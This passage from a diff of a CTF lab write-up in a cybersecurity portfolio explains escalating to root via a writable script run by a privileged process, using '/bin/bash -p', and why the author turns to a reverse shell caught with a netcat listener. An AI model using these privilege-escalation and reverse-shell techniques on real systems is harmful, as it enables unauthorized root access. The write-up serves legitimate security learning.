Mamoru3/Cybersecurity-Portfolio/writeups/easy_labs/Bassam_CTF/Bassam_CTF.md

 ```
 when script.sh is run by a privileged process, /bin/bash -p spawns a bash shell that preserves the elevated privileges (-p disables the effective UID reset).
 This is a common technique when you find a writable script that gets executed as root.

-This however did not work, so I try to opt for a reverse shell approach.
+This didn't work because curl pipes to bash in a non-interactive context, so /bin/bash -p exits immediately.
+A reverse shell creates a persistent TCP connection, giving us an interactive root shell.

 I use netcat on my attacking machine to listen to port 8090.
 ```
 nc -lnvp -8090